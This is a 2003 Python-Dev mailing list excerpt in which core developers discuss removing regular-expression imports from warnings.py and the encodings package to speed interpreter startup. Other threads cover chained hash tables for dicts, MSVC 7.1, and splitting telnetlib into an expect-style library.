 <200305141737.h4EHbMv06730@odiug.zope.com>
 <16066.33949.903064.834797@montanaro.dyndns.org>
Message-ID: <16066.34707.101894.297890@montanaro.dyndns.org>

    Skip> I'll see what I can come up with and submit a patch.

Okay, this seems too simple. ;-) There's no need to compile the message and
module arguments to filterwarnings.  Just store them as strings and call
re.match() later with the appropriate args.  That takes care of that one.  I
think use of the -W command line flag is infrequent enough that it doesn't
really matter that _processoptions, _setoption and _getcategory might get
called at startup.  Most of the time sys.warnoptions will be an empty list,
so _setoption and _getcategory won't be called.
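
In other words, something like this (a simplified sketch, not the actual
warnings.py code):

    _filters = []

    def filterwarnings(action, message="", category=Warning,
                       module="", lineno=0):
        # just remember the pattern text; no "import re" needed here
        _filters.append((action, message, category, module, lineno))

    def _pattern_matches(pattern, text):
        if not pattern:
            return True
        import re                  # only paid for when a warning fires
        return re.match(pattern, text) is not None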

Aside: Why are message and module names given on the command line treated as
literal strings, while message and module names passed directly to
filterwarnings() are treated as regular expressions?  If the former were
treated as regular expressions, the calls to re.escape() could be removed
and _setoption wouldn't use re either.

Skip


From guido@python.org  Wed May 14 19:23:16 2003
From: guido@python.org (Guido van Rossum)
Date: Wed, 14 May 2003 14:23:16 -0400
Subject: [Python-Dev] Re: [Python-checkins] python/dist/src/Lib warnings.py,1.19,1.20
In-Reply-To: Your message of "Wed, 14 May 2003 13:14:43 CDT."
 <16066.34707.101894.297890@montanaro.dyndns.org>
References: <E19G08Z-0003us-00@sc8-pr-cvs1.sourceforge.net> <200305141737.h4EHbMv06730@odiug.zope.com> <16066.33949.903064.834797@montanaro.dyndns.org>
 <16066.34707.101894.297890@montanaro.dyndns.org>
Message-ID: <200305141823.h4EINGt15343@odiug.zope.com>

>     Skip> I'll see what I can come up with and submit a patch.
> 
> Okay, this seems too simple. ;-) There's no need to compile the message and
> module arguments to filterwarnings.  Just store them as strings and call
> re.match() later with the appropriate args.  That takes care of that one.  I
> think use of the -W command line flag is infrequent enough that it doesn't
> really matter that _processoptions, _setoption and -getcategory might get
> called at startup.  Most of the time sys.warnoptions will be an empty list,
> so _setoption and _getcategory won't be called.

OK.  Please report old and new startup times!

> Aside: Why are message and module names given on the command line treated as
> literal strings while message and module names which are passed directly to
> filterwarnings() treated as regular expressions?  If they were treated as
> regular expressions, the calls to re.escape() could be removed and
> _setoptions wouldn't use re either.

Um, I don't remember.  It would seem to be useful, wouldn't it?  The
only reason I can come up with is that for dotted names, the dot would
have to be escaped on the command line, and escaping something on the
command line is painful because \ is also a shell escape character, so
you'd have to escape the escape.
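
To make the escaping point concrete (made-up snippet, not from warnings.py):

    import re

    assert re.match("foo.bar", "foolbar")               # "." matches the "l"
    assert not re.match(re.escape("foo.bar"), "foolbar")
    assert re.match(re.escape("foo.bar"), "foo.bar")    # only the literal name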

--Guido van Rossum (home page: http://www.python.org/~guido/)


From skip@pobox.com  Wed May 14 20:32:23 2003
From: skip@pobox.com (Skip Montanaro)
Date: Wed, 14 May 2003 14:32:23 -0500
Subject: [Python-Dev] Re: [Python-checkins] python/dist/src/Lib
 warnings.py, 1.19, 1.20
In-Reply-To: <200305141823.h4EINGt15343@odiug.zope.com>
References: <E19G08Z-0003us-00@sc8-pr-cvs1.sourceforge.net>
 <200305141737.h4EHbMv06730@odiug.zope.com>
 <16066.33949.903064.834797@montanaro.dyndns.org>
 <16066.34707.101894.297890@montanaro.dyndns.org>
 <200305141823.h4EINGt15343@odiug.zope.com>
Message-ID: <16066.39367.822086.836812@montanaro.dyndns.org>

--g4s0SsAiBg
Content-Type: text/plain; charset=us-ascii
Content-Description: message body text
Content-Transfer-Encoding: 7bit


    Guido> OK.  Please report old and new startup times!

That seems to be a little harder than you'd think.  First, I had to fix
encodings/__init__.py as well.  Here are some numbers.  In all cases the
interpreter is as I built it from CVS on May 6.  PYTHONSTARTUP is not
defined.

    "import re" at top level:

    Without -S (best real time of 5 runs):

        % time python -c pass
        
        real    0m0.169s
        user    0m0.100s
        sys     0m0.030s

    With -S (best of 5):

        % time python -S -c pass
        
        real    0m0.125s
        user    0m0.020s
        sys     0m0.080s

    Proposed mods to warnings.py (and provisional replacement of re with
    string translation tables in encodings/__init__.py):

    Without -S (best of 5):

        % time python -c pass

        real    0m0.187s
        user    0m0.120s
        sys     0m0.030s

    With -S (best of 5):

        % time python -S -c pass

        real    0m0.118s
        user    0m0.020s
        sys     0m0.020s

Not too exciting.  I verified using -v that these modules are imported in
2.3 with no PYTHONSTARTUP and the -S flag after my changes:

    UserDict
    copy_reg
    linecache
    os
    posix
    posixpath
    stat
    types
    warnings
    zipimport

Without -S (and my sitecustomize.py file moved) I get these:

    UserDict
    copy_reg
    linecache
    os
    posix
    posixpath
    site
    stat
    types
    warnings
    zipimport

I've got to get back to some paying work, so I can't pursue this more at the
moment.  Attached are my current diffs for warnings.py and encodings/
__init__.py if someone has a few moments to look at them.

Skip


--g4s0SsAiBg
Content-Type: application/octet-stream
Content-Disposition: attachment;
        filename="nore.diff"
Content-Transfer-Encoding: base64

SW5kZXg6IExpYi93YXJuaW5ncy5weQo9PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09
PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09ClJDUyBmaWxlOiAvY3Zzcm9v
dC9weXRob24vcHl0aG9uL2Rpc3Qvc3JjL0xpYi93YXJuaW5ncy5weSx2CnJldHJpZXZpbmcg
cmV2aXNpb24gMS4yMApkaWZmIC1jIC1yMS4yMCB3YXJuaW5ncy5weQoqKiogTGliL3dhcm5p
bmdzLnB5CTE0IE1heSAyMDAzIDE3OjMzOjUzIC0wMDAwCTEuMjAKLS0tIExpYi93YXJuaW5n
cy5weQkxNCBNYXkgMjAwMyAxOToyNzozMiAtMDAwMAoqKioqKioqKioqKioqKioKKioqIDMs
OSAqKioqCiAgIyBOb3RlOiBmdW5jdGlvbiBsZXZlbCBpbXBvcnRzIHNob3VsZCAqbm90KiBi
ZSB1c2VkCiAgIyBpbiB0aGlzIG1vZHVsZSBhcyBpdCBtYXkgY2F1c2UgaW1wb3J0IGxvY2sg
ZGVhZGxvY2suCiAgIyBTZWUgYnVnIDY4MzY1OC4KISBpbXBvcnQgc3lzLCB0eXBlcwogIGlt
cG9ydCBsaW5lY2FjaGUKICAKICBfX2FsbF9fID0gWyJ3YXJuIiwgInNob3d3YXJuaW5nIiwg
ImZvcm1hdHdhcm5pbmciLCAiZmlsdGVyd2FybmluZ3MiLAotLS0gMyw5IC0tLS0KICAjIE5v
dGU6IGZ1bmN0aW9uIGxldmVsIGltcG9ydHMgc2hvdWxkICpub3QqIGJlIHVzZWQKICAjIGlu
IHRoaXMgbW9kdWxlIGFzIGl0IG1heSBjYXVzZSBpbXBvcnQgbG9jayBkZWFkbG9jay4KICAj
IFNlZSBidWcgNjgzNjU4LgohIGltcG9ydCBzeXMsIHJlLCB0eXBlcwogIGltcG9ydCBsaW5l
Y2FjaGUKICAKICBfX2FsbF9fID0gWyJ3YXJuIiwgInNob3d3YXJuaW5nIiwgImZvcm1hdHdh
cm5pbmciLCAiZmlsdGVyd2FybmluZ3MiLAoqKioqKioqKioqKioqKioKKioqIDEyOSwxMzUg
KioqKgogICAgICAiIiJJbnNlcnQgYW4gZW50cnkgaW50byB0aGUgbGlzdCBvZiB3YXJuaW5n
cyBmaWx0ZXJzIChhdCB0aGUgZnJvbnQpLgogIAogICAgICBVc2UgYXNzZXJ0aW9ucyB0byBj
aGVjayB0aGF0IGFsbCBhcmd1bWVudHMgaGF2ZSB0aGUgcmlnaHQgdHlwZS4iIiIKLSAgICAg
aW1wb3J0IHJlCiAgICAgIGFzc2VydCBhY3Rpb24gaW4gKCJlcnJvciIsICJpZ25vcmUiLCAi
YWx3YXlzIiwgImRlZmF1bHQiLCAibW9kdWxlIiwKICAgICAgICAgICAgICAgICAgICAgICAg
Im9uY2UiKSwgImludmFsaWQgYWN0aW9uOiAlcyIgJSBgYWN0aW9uYAogICAgICBhc3NlcnQg
aXNpbnN0YW5jZShtZXNzYWdlLCBiYXNlc3RyaW5nKSwgIm1lc3NhZ2UgbXVzdCBiZSBhIHN0
cmluZyIKLS0tIDEyOSwxMzQgLS0tLQoqKioqKioqKioqKioqKioKKioqIDE2MywxNjkgKioq
KgogIAogICMgSGVscGVyIGZvciBfcHJvY2Vzc29wdGlvbnMoKQogIGRlZiBfc2V0b3B0aW9u
KGFyZyk6Ci0gICAgIGltcG9ydCByZQogICAgICBwYXJ0cyA9IGFyZy5zcGxpdCgnOicpCiAg
ICAgIGlmIGxlbihwYXJ0cykgPiA1OgogICAgICAgICAgcmFpc2UgX09wdGlvbkVycm9yKCJ0
b28gbWFueSBmaWVsZHMgKG1heCA1KTogJXMiICUgYGFyZ2ApCi0tLSAxNjIsMTY3IC0tLS0K
KioqKioqKioqKioqKioqCioqKiAyMDAsMjA2ICoqKioKICAKICAjIEhlbHBlciBmb3IgX3Nl
dG9wdGlvbigpCiAgZGVmIF9nZXRjYXRlZ29yeShjYXRlZ29yeSk6Ci0gICAgIGltcG9ydCBy
ZQogICAgICBpZiBub3QgY2F0ZWdvcnk6CiAgICAgICAgICByZXR1cm4gV2FybmluZwogICAg
ICBpZiByZS5tYXRjaCgiXlthLXpBLVowLTlfXSskIiwgY2F0ZWdvcnkpOgotLS0gMTk4LDIw
MyAtLS0tCkluZGV4OiBMaWIvZW5jb2RpbmdzL19faW5pdF9fLnB5Cj09PT09PT09PT09PT09
PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0K
UkNTIGZpbGU6IC9jdnNyb290L3B5dGhvbi9weXRob24vZGlzdC9zcmMvTGliL2VuY29kaW5n
cy9fX2luaXRfXy5weSx2CnJldHJpZXZpbmcgcmV2aXNpb24gMS4xOApkaWZmIC1jIC1yMS4x
OCBfX2luaXRfXy5weQoqKiogTGliL2VuY29kaW5ncy9fX2luaXRfXy5weQkyNCBBcHIgMjAw
MyAxNjowMjo0OSAtMDAwMAkxLjE4Ci0tLSBMaWIvZW5jb2RpbmdzL19faW5pdF9fLnB5CTE0
IE1heSAyMDAzIDE5OjI3OjMyIC0wMDAwCioqKioqKioqKioqKioqKgoqKiogMjcsMzkgKioq
KgogIAogICIiIiMiCiAgCiEgaW1wb3J0IGNvZGVjcywgZXhjZXB0aW9ucywgcmUKICAKICBf
Y2FjaGUgPSB7fQogIF91bmtub3duID0gJy0tdW5rbm93bi0tJwogIF9pbXBvcnRfdGFpbCA9
IFsnKiddCiEgX25vcm1fZW5jb2RpbmdfUkUgPSByZS5jb21waWxlKCdbXmEtekEtWjAtOS5d
JykKICAKICBjbGFzcyBDb2RlY1JlZ2lzdHJ5RXJyb3IoZXhjZXB0aW9ucy5Mb29rdXBFcnJv
ciwKICAgICAgICAgICAgICAgICAgICAgICAgICAgZXhjZXB0aW9ucy5TeXN0ZW1FcnJvcik6
CiAgICAgIHBhc3MKLS0tIDI3LDQ4IC0tLS0KICAKICAiIiIjIgogIAohIGltcG9ydCBjb2Rl
Y3MsIGV4Y2VwdGlvbnMsIHN0cmluZwogIAogIF9jYWNoZSA9IHt9CiAgX3Vua25vd24gPSAn
LS11bmtub3duLS0nCiAgX2ltcG9ydF90YWlsID0gWycqJ10KISAjX25vcm1fZW5jb2Rpbmdf
UkUgPSByZS5jb21waWxlKCdbXmEtekEtWjAtOS5dJykKICAKKyAjIGEgbGl0dGxlIGRhbmNl
IHRvIGF2b2lkIHVzaW5nIHJlCisgX25vcm1fZW5jb2RpbmdfdHJhbnMgPSAoIl8iKm9yZCgn
MCcpKworICAgICAgICAgICAgICAgICAgICAgICAgIHN0cmluZy5kaWdpdHMrCisgICAgICAg
ICAgICAgICAgICAgICAgICAgIl8iKihvcmQoJ0EnKS1vcmQoJzknKS0xKSsKKyAgICAgICAg
ICAgICAgICAgICAgICAgICBzdHJpbmcuYXNjaWlfdXBwZXJjYXNlKworICAgICAgICAgICAg
ICAgICAgICAgICAgICJfIioob3JkKCdhJyktb3JkKCdaJyktMSkrCisgICAgICAgICAgICAg
ICAgICAgICAgICAgc3RyaW5nLmFzY2lpX2xvd2VyY2FzZSsKKyAgICAgICAgICAgICAgICAg
ICAgICAgICAiXyIqKDI1Ni1vcmQoJ3onKS0xKSkKKyAgICAgICAgICAgICAgICAgICAgICAg
ICAKICBjbGFzcyBDb2RlY1JlZ2lzdHJ5RXJyb3IoZXhjZXB0aW9ucy5Mb29rdXBFcnJvciwK
ICAgICAgICAgICAgICAgICAgICAgICAgICAgZXhjZXB0aW9ucy5TeXN0ZW1FcnJvcik6CiAg
ICAgIHBhc3MKKioqKioqKioqKioqKioqCioqKiA0OCw1NCAqKioqCiAgICAgICAgICBiZWNv
bWVzICdfJy4KICAKICAgICAgIiIiCiEgICAgIHJldHVybiAnXycuam9pbihfbm9ybV9lbmNv
ZGluZ19SRS5zcGxpdChlbmNvZGluZykpCiAgCiAgZGVmIHNlYXJjaF9mdW5jdGlvbihlbmNv
ZGluZyk6CiAgCi0tLSA1Nyw2MyAtLS0tCiAgICAgICAgICBiZWNvbWVzICdfJy4KICAKICAg
ICAgIiIiCiEgICAgIHJldHVybiBzdHJpbmcudHJhbnNsYXRlKGVuY29kaW5nLCBfbm9ybV9l
bmNvZGluZ190cmFucykKICAKICBkZWYgc2VhcmNoX2Z1bmN0aW9uKGVuY29kaW5nKToKICAK
--g4s0SsAiBg--


From dave@boost-consulting.com  Thu May 15 01:22:46 2003
From: dave@boost-consulting.com (David Abrahams)
Date: Wed, 14 May 2003 20:22:46 -0400
Subject: [Python-Dev] Re: MS VC 7 offer
References: <3EBCABD0.7050700@lemburg.com> <BIEJKCLHCIOIHAGOKOLHKEDLFKAA.tim.one@comcast.net>
 <3EBCABD0.7050700@lemburg.com>
 <5.1.1.6.0.20030512222353.022ade78@torment.chelsea.private>
Message-ID: <uy919ys6h.fsf@boost-consulting.com>

Barry Scott <barry@barrys-emacs.org> writes:

> Did I miss the answer to why bother to move to VC7?
>
> As a C project I know of very little to recommend VC7 or VC7.1.
> As a C++ developer I've decided that VC7 is little more than a broken
> VC6. 

That was roughly my experience, support for template template
arguments notwithstanding.

> Maybe Jesse Lipcon (who works for MS now) has managed to
> make VC7.1 more standards compatible for C++ work, which would
> recommend it to C++ developers.

That's not a maybe.  As a hard-core C++-head, I can tell you that
it's like night and day.  VC7.1 is very, very good.

> Note that wxPython claims that it will not compile correctly with
> VC7 unless you add a work around for a bug in the code generator.

It's very unlikely that this bug survived the VC7.1 release, but I
suppose it's possible.

-- 
Dave Abrahams
Boost Consulting
www.boost-consulting.com



From tim.one@comcast.net  Thu May 15 04:08:18 2003
From: tim.one@comcast.net (Tim Peters)
Date: Wed, 14 May 2003 23:08:18 -0400
Subject: [Python-Dev] Simple dicts
Message-ID: <LNBBLJKPBEHFEDALKOLCEEKEEFAB.tim.one@comcast.net>

Behind the scenes, Damien Morton has been playing with radically different
designs for "small" dicts.  This reminded me that, in previous lives, I
always used chaining ("linked lists") for collision resolution in hash
tables.  I don't have time to pursue this now, but it would make a nice
experiment for someone who wants to try a non-trivial but still-simple and
interesting project.  It may even pay off, but that shouldn't be a
motivation <wink>.

Design notes:

PyDictEntry would grow a new

	PyDictEntry *next;

slot, boosting it from 12 to 16 bytes on a 32-bit box.  This wasn't
reasonable when Python was designed, but pymalloc allocates 16-byte chunks
with virtually no wasted space.

PyDictObject would lose the ma_fill, ma_table, and ma_smalltable members,
and gain a pointer to a variable-size vector of pointers

	PyDictEntry **first;

For a hash table with 2**n slots, this vector holds 2**n pointers, memset to
NULL initially.  The hash chain for an object with hash code h starts at
first[h & ma_mask], and is linked together via PyDictEntry.next pointers.
Hash chains per hash code are independent.  There's no use for the "dummy"
state.  There's no *logical* need for the "unused" state either, although a
micro-optimizer may want to retain that in some form.
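
For concreteness, here's a toy Python model of that layout (purely
illustrative -- the C member names are reused, everything else is made up):

    class _Entry(object):
        __slots__ = ("me_hash", "me_key", "me_value", "next")
        def __init__(self, h, key, value):
            self.me_hash, self.me_key, self.me_value = h, key, value
            self.next = None                # next entry with the same h & mask

    class ChainedDict(object):
        """Toy model: 2**n head pointers, one independent chain per slot."""
        def __init__(self, log2size=3):
            self.ma_mask = (1 << log2size) - 1
            self.first = [None] * (1 << log2size)    # the "first" vector

        def lookup(self, key):
            h = hash(key)
            p = self.first[h & self.ma_mask]
            while p is not None:                     # just a list walk
                if p.me_key is key or (p.me_hash == h and p.me_key == key):
                    return p
                p = p.next
            return None

        def insert(self, key, value):
            p = self.lookup(key)
            if p is not None:
                p.me_value = value
                return
            h = hash(key)
            i = h & self.ma_mask
            e = _Entry(h, key, value)
            e.next = self.first[i]                   # link in at the chain head
            self.first[i] = e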

Memory use isn't nearly as bad as it may first appear -- to the contrary,
it's probably better on average!  Assuming a 32-bit box:

Current:  tables are normally 1/3 to 2/3 full.  If there are N active
objects in the table, at 1/3 full the table contains 3*N PyDictEntries, and
at 2/3 full it contains 1.5*N PyDictEntries, for a total of (multiplying by
12 bytes per PyDictEntry) 18*N to 36*N bytes.

Chaining:  assuming tables are still 1/3 to 2/3 full.  At 1/3 full there are
3*N first pointers and at 2/3 full there are 1.5*N first pointers, for a
total of 6*N to 12*N bytes for first pointers.  Independent of load factor,
16*N bytes are consumed by the larger PyDictEntry structs.  Adding, that's
22*N to 28*N bytes.  This relies on pymalloc's tiny wastage when allocating
16-byte chunks (under 1%).  The worst case is worse than the current scheme,
and the best case is better.  The average is probably better.

Note that "full" is a misnomer here.  A chained table with 2**i slots can
actually hold any number of objects, even if i==0; on average, each hash
chain contains N/2**i PyDictEntry structs.

Note that a small load factor is less important with chained resolution than
with open addressing, because collisions at different hash codes can't
interfere with each other (IOW, an object in slot #i never slows access to
an object in the slot #j collision list, whenever i != j; "breathing room"
to ease cross-hashcode collision pressure isn't needed; primary collisions
are all that exist).

Collision resolution code:  Just a list walk.  For example, lookdict_string
could be, in its entirety:

static dictentry *
lookdict_string(dictobject *mp, PyObject *key, register long hash)
{
	dictentry *p = mp->first[hash & mp->ma_mask];

	if (PyString_CheckExact(key)) {
		for (; p != NULL; p = p->next) {
			if (p->me_key == key ||
			    (p->me_hash == hash &&
			     PyString_Eq(p->me_key, key)))
				return p;
		}
		return NULL;
	}

	mp->ma_lookup = lookdict;
	return lookdict(mp, key, hash);
}

Resizing:  Probably much faster.  The vector of first pointers can be
realloc'ed, and sometimes benefit from the platform malloc extending it
in-place.  No other memory allocation operation is needed on a resize.
Instead about half the PyDictEntry structs will need to move to "the other
half" of the table (the structs themselves don't get copied or moved; they
just get relinked via their next pointers).
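
Continuing the toy model above, a resize might look roughly like this (again
just a sketch, assuming the ChainedDict class from the sketch above):

    def resize(d):
        # Double the table: entries are never copied or moved, they are
        # simply relinked via their next pointers into the larger vector.
        old_first = d.first
        d.ma_mask = d.ma_mask * 2 + 1
        d.first = [None] * (d.ma_mask + 1)
        for head in old_first:
            p = head
            while p is not None:
                nxt = p.next
                i = p.me_hash & d.ma_mask
                p.next = d.first[i]
                d.first[i] = p
                p = nxt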

Copying:  Probably slower, due to needing a PyObject_Malloc() call for each
key/value pair.

Building a dict up:  Probably slower, again due to repeated
PyObject_Malloc() calls.

Referencing a dict:  Probably a wash, although because the code can be so
much simpler compilers may do a better job of optimizing it, and no tests
are needed to distinguish among three kinds of states.  Out-of-cache dicts
are killers either way.  Also see next point.

Optimizations:  The cool algorithmic thing about chaining is that
self-organizing gimmicks (like swap-toward-front (or move-to-front) on
reference) are easy to code and run fast (again, the dictentry structs don't
move, you just need to fiddle a few next pointers).  When collision chains
can collide, dynamic table reorganization is so complicated and expensive
that nobody has even thought about trying it in Python.  When they can't
collide, it's simple.  Note too that since the memory burden per unused slot
falls from 12 to 4 bytes, sparser tables are less painful to contemplate.
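
As a sketch of that gimmick on the same toy layout (again assuming the
ChainedDict model above; none of this is proposed implementation code):

    def lookup_move_to_front(d, key):
        # A hit that isn't already at the head of its chain gets unlinked and
        # relinked at the front; the entry object itself never moves.
        h = hash(key)
        i = h & d.ma_mask
        prev, p = None, d.first[i]
        while p is not None:
            if p.me_key is key or (p.me_hash == h and p.me_key == key):
                if prev is not None:
                    prev.next = p.next
                    p.next = d.first[i]
                    d.first[i] = p
                return p
            prev, p = p, p.next
        return None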

Small dicts:  There's no gimmick here to favor them.



From cgw@alum.mit.edu  Thu May 15 05:38:26 2003
From: cgw@alum.mit.edu (Charles G Waldman)
Date: Wed, 14 May 2003 23:38:26 -0500
Subject: [Python-Dev] Re: [Python-checkins] python/dist/src/Lib warnings.py,1.19,1.20
In-Reply-To: <20030515030905.382.60542.Mailman@mail.python.org>
References: <20030515030905.382.60542.Mailman@mail.python.org>
Message-ID: <16067.6594.326128.398884@nyx.dyndns.org>

GvR> only reason I can come up with is that for dotted names, the dot would
GvR> have to be escaped on the command line, and escaping something on the
GvR> command line is painful because \ is also a shell escape character, so
GvR> you'd have to escape the escape.

I'm afraid I must be missing something terribly obvious here, but why
would you need to escape a dot on a command line?  None of the shells
I'm familiar with treat dot as a metacharacter.  Isn't `?' the
standard shell metacharacter for "any character"?  Filename patterns
on the shell command line are "glob patterns", not RE's.

But, like I said, I'm probably missing something.  I think I'll go
back into the shadows to lurk some more now....  Charles


From fdrake@acm.org  Thu May 15 05:43:57 2003
From: fdrake@acm.org (Fred L. Drake, Jr.)
Date: Thu, 15 May 2003 00:43:57 -0400
Subject: [Python-Dev] Re: [Python-checkins] python/dist/src/Lib
 warnings.py,1.19,1.20
In-Reply-To: <16067.6594.326128.398884@nyx.dyndns.org>
References: <20030515030905.382.60542.Mailman@mail.python.org>
 <16067.6594.326128.398884@nyx.dyndns.org>
Message-ID: <16067.6925.897980.796041@grendel.zope.com>

Charles G Waldman writes:
 > I'm afraid I must be missing something terribly obvious here, but why
 > would you need to escape a dot on a command line?  None of the shells
 > I'm familiar with treat dot as a metacharacter.  Isn't `?' the
 > standard shell metacharacter for "any character"?  Filename patterns
 > on the shell command line are "glob patterns", not RE's.

It's not the shell that treats it as a metacharacter, but the RE
syntax.  Preventing "." from being treated as an RE metacharacter
would be done by inserting a "\" character, which is a shell
metacharacter, and would need another "\" to escape that, so that one
of the "\" would end up in the RE.

Of course, my favorite way of dealing with this is to use single
quotes around the argument rather than backslashes; that works fine in
sh-syntax shells, and doesn't require doubling-up backslashes.



  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Zope Corporation


From drifty@alum.berkeley.edu  Thu May 15 07:45:54 2003
From: drifty@alum.berkeley.edu (Brett C.)
Date: Wed, 14 May 2003 23:45:54 -0700
Subject: [Python-Dev] Simple dicts
In-Reply-To: <LNBBLJKPBEHFEDALKOLCEEKEEFAB.tim.one@comcast.net>
References: <LNBBLJKPBEHFEDALKOLCEEKEEFAB.tim.one@comcast.net>
Message-ID: <3EC337A2.7060702@ocf.berkeley.edu>

Tim Peters wrote:
> Behind the scenes, Damien Morton has been playing with radically different
> designs for "small" dicts.  This reminded me that, in previous lives, I
> always used chaining ("linked lists") for collision resolution in hash
> tables.  I don't have time to pursue this now, but it would make a nice
> experiment for someone who wants to try a non-trivial but still-simple and
> interesting project.  It may even pay off, but that shouldn't be a
> motivation <wink>.
> 

When I took data structures I was taught that chaining was actually the 
easiest way to do hash tables and they still had good performance 
compared to open addressing.  Because of this taught bias I always 
wondered why Python used open addressing; can someone tell me?

I am interested in seeing how this would pan out, but I am unfortunately 
going to be busy for the next three days (if anyone is going to be at E3 
Thursday or Friday for some odd reason let me know since I will be 
there).  If someone takes this up please let me know; I am interested in 
helping if I can.  Perhaps this should be a sandbox thing?

-Brett



From lkcl@samba-tng.org  Thu May 15 09:59:27 2003
From: lkcl@samba-tng.org (Luke Kenneth Casson Leighton)
Date: Thu, 15 May 2003 08:59:27 +0000
Subject: [Python-Dev] Re: sf.net/708007: expectlib.py telnetlib.py split
In-Reply-To: <20030513225740.GH2305@localhost>
References: <20030513225740.GH2305@localhost>
Message-ID: <20030515085927.GD908@localhost>

raymond, regarding expect.py which you give a link to:

- expect.py is extremely basic, offering pretty much only read and
  write.

  what it _actually_ offers is an advantage over the python
  distribution's popen2/3 because it catches ptys (stdin)
  even on ssh and passwd.

- expectlib.py [new] _is_ telnetlib.py [old] - with over-rideable
  read, write, open and close methods.

- pexpect is like... an independently developed version of the above,
  with all of the above functionality And Then Some - including
  an ANSI screen emulator should an application developer choose to
  use it.

what i figure is a sensible roadmap to suggest / propose to people:

- telnetlib.py [old] gets split into telnetlib.py [patched] plus
  expectlib.py [patched].

- noah investigates expectlib.py and a) works some magic on it
  b) uses it in pexpect.

- someone independently investigates expect.py's popen2 c-code
  capability to see if it can be merged into the python distribution.


i do not know if it is a "bug" that python's popen functions cannot
capture ssh / passwd but it would certainly appear to be sensible
to have an option to allow ALL user input to be captured.

certainly i found it a total pain two years ago to have to patch
ssh to allow a user password to be accepted on the command-line!

[i didn't know about expect.py then]


last time i spoke to guido about the telnetlib.py/expectlib.py patch,
he a) wasn't so madly busy as he is now, b) rejected the then-patch
because it wasn't clean c) acknowledged that telnetlib.py is a mess
and needed a complete rewrite.

since that time, i notice that telnetlib.py has had a control-char
handling function, which alleviates some of the need for a complete
rewrite.

l.

On Tue, May 13, 2003 at 10:57:40PM +0000, Luke Kenneth Casson Leighton wrote:

> [i am not on the python-dev list but i check the archives, please cc me]
> 
> approximately two years ago i needed the functionality outlined
> in the present telnetlib.py for several other remote protocols,
> most notably commands (including ssh and bash) and also HTTP.
> 
> i figure that this functionality should be more than invaluable
> to other python developers.


From walter@livinglogic.de  Thu May 15 11:05:22 2003
From: walter@livinglogic.de (=?ISO-8859-1?Q?Walter_D=F6rwald?=)
Date: Thu, 15 May 2003 12:05:22 +0200
Subject: [Python-Dev] Re: [Python-checkins] python/dist/src/Lib warnings.py,
 1.19, 1.20
In-Reply-To: <16066.39367.822086.836812@montanaro.dyndns.org>
References: <E19G08Z-0003us-00@sc8-pr-cvs1.sourceforge.net>        <200305141737.h4EHbMv06730@odiug.zope.com>        <16066.33949.903064.834797@montanaro.dyndns.org>        <16066.34707.101894.297890@montanaro.dyndns.org>        <200305141823.h4EINGt15343@odiug.zope.com> <16066.39367.822086.836812@montanaro.dyndns.org>
Message-ID: <3EC36662.5070706@livinglogic.de>

This is a multi-part message in MIME format.
--------------020507060202080607040303
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 8bit

Skip Montanaro wrote:

> [...]
> I've got to get back to some paying work, so I can't pursue this more at the
> moment.  Attached are my current diffs for warnings.py and encodings/
> __init__.py if someone has a few moments to look at it.

Your normalize_encoding() doesn't preserve the "." and it doesn't
collapse consecutive non-alphanumeric characters. Furthermore it imports
the string module. How about the attached patch? Constructing the
translation string might be bad for startup time.

Bye,
    Walter Dörwald


--------------020507060202080607040303
Content-Type: text/plain;
 name="diff.txt"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
 filename="diff.txt"

Index: Lib/encodings/__init__.py
===================================================================
RCS file: /cvsroot/python/python/dist/src/Lib/encodings/__init__.py,v
retrieving revision 1.18
diff -u -r1.18 __init__.py
--- Lib/encodings/__init__.py	24 Apr 2003 16:02:49 -0000	1.18
+++ Lib/encodings/__init__.py	15 May 2003 10:00:52 -0000
@@ -32,7 +32,13 @@
 _cache = {}
 _unknown = '--unknown--'
 _import_tail = ['*']
-_norm_encoding_RE = re.compile('[^a-zA-Z0-9.]')
+_norm_encoding_trans = []
+for i in xrange(128):
+    c = chr(i)
+    if not c.isalnum() and not c==".":
+        c = "_"
+    _norm_encoding_trans.append(c)
+_norm_encoding_trans = "".join(_norm_encoding_trans) + "_"*128
 
 class CodecRegistryError(exceptions.LookupError,
                          exceptions.SystemError):
@@ -48,7 +54,7 @@
         becomes '_'.
 
     """
-    return '_'.join(_norm_encoding_RE.split(encoding))
+    return '_'.join(filter(None, encoding.translate(_norm_encoding_trans).split("_")))
 
 def search_function(encoding):
 

--------------020507060202080607040303--



From guido@python.org  Thu May 15 12:07:04 2003
From: guido@python.org (Guido van Rossum)
Date: Thu, 15 May 2003 07:07:04 -0400
Subject: [Python-Dev] Re: [Python-checkins] python/dist/src/Lib
 warnings.py,1.19,1.20
In-Reply-To: "Your message of Thu, 15 May 2003 00:43:57 EDT."
 <16067.6925.897980.796041@grendel.zope.com>
References: <20030515030905.382.60542.Mailman@mail.python.org>
 <16067.6594.326128.398884@nyx.dyndns.org>
 <16067.6925.897980.796041@grendel.zope.com>
Message-ID: <200305151107.h4FB75O17039@pcp02138704pcs.reston01.va.comcast.net>

> Of course, my favorite way of dealing with this is to use single
> quotes around the argument rather than backslashes; that works fine in
> sh-syntax shells, and doesn't require doubling-up backslashes.

Agreed, but you're still using two levels of quoting, and with
anything less, "foo.bar" will also match a module named "foolbar".

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@python.org  Thu May 15 12:10:37 2003
From: guido@python.org (Guido van Rossum)
Date: Thu, 15 May 2003 07:10:37 -0400
Subject: [Python-Dev] Simple dicts
In-Reply-To: "Your message of Wed, 14 May 2003 23:45:54 PDT."
 <3EC337A2.7060702@ocf.berkeley.edu>
References: <LNBBLJKPBEHFEDALKOLCEEKEEFAB.tim.one@comcast.net>
 <3EC337A2.7060702@ocf.berkeley.edu>
Message-ID: <200305151110.h4FBAb717062@pcp02138704pcs.reston01.va.comcast.net>

> When I took data structures I was taught that chaining was actually the 
> easiest way to do hash tables and they still had good performance 
> compared to open addressing.  Because of this taught bias I always 
> wondered why Python used open addressing; can someone tell me?

It was my choice, but I don't recall why.  Probably because Knuth said
so.  Or because it's simpler to implement with a single allocated
block (I think I was aware of the cost of malloc(), or else tuples and
strings would have used two blocks.  BTW, why don't Unicode objects
use this trick?)

--Guido van Rossum (home page: http://www.python.org/~guido/)


